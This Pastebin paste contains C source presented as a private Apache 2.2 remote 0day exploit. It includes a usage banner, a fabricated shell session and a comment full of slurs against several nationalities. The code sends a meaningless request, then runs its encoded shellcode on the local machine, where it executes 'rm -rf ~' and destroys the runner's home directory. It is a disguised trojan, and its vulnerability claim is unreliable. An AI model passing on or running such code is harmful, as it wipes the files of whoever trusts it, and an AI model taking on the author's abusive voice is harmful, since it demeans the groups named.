Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- ===========================================================
- !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE!
- ===========================================================
- Apache 2.2.0 - 2.2.11 Remote exploit
- Exploiting an off-by one bug in apr_uri_parse_hostinfo()
- which leads to allocation of arbitrary ammount of memory,
- put the shellcode then reliably jump in upon invocation
- of the APR callback.
- Compile: gcc fuckapache.c -o fuckapache
- Usage: ./fuckapache <hostname> <port>
- E.g:
- ===========================================================
- [test@localhost tmp]$ ./fuck localhost 80
- Connected, sending out the evil request...
- Waiting some seconds to see if we got shell...
- Now type nc localhost 12345 to see if you've got shell there
- [test@localhost tmp]$ nc localhost 12345
- id
- uid=48(apache) gid=48(apache) groups=48(apache)
- ^D
- ==========================================================
- Fuck all script kiddies around the world. No more free bugs, get lost.
- Fuck all Indonesian, Malaysian, Pakistani, Saudi, Marrocan, Nigerian,
- Turkish and other third-world *hack3rz* whose only contribution to the
- world is writing dummy sqli scripts in python flooding the net
- with BS like "kekekekeke" "ajjajaja" "i kill you".
- Feel free to suck my balls, all of you.
- Have phun :)
- */
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- #include <string.h>
- #include <unistd.h>
- #include <stdlib.h>
- void usage(char *argv[])
- {
- printf("Usage: %s <hostname> <port>\n\n",argv[0]);
- exit(1);
- }
- int main(int argc,char *argv[])
- {
- // we_are_evil_we_are_evil_bindshell_31337_shellcode_in_91_bytes:>
- char *shellcode=
- "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
- "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
- "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
- "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
- "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
- "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
- "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
- int (*sc)()=(int(*)())shellcode;
- char host[100];
- int sd;
- struct sockaddr_in sin;
- struct sockaddr_in pin;
- struct hostent *hp;
- // assuming PAGE_SIZE==4096 which is the most common case.
- char *evilreq=malloc(4096);
- pid_t pid;
- if (argc!=3) usage(argv);
- strcpy(host,argv[1]);
- if ((hp = gethostbyname(host)) == 0) {
- perror("gethostbyname");
- exit(2);
- }
- memset(&pin, 0, sizeof(pin));
- pin.sin_family = AF_INET;
- pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
- pin.sin_port = htons(atoi(argv[2]));
- if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- perror("socket");
- exit(1);
- }
- if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) {
- perror("connect");
- exit(3);
- }
- printf("Connected, sending out the evil request...\n");
- // prepare teh evil request
- sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
- if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
- perror("send");
- exit(1);
- }
- printf("Waiting some seconds to see if we got shell...\n");
- pid=fork();
- if (pid==0) {close(2);sc();exit(0);}
- else
- {
- sleep(2);
- if (sd)
- {
- printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]);
- close(sd);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement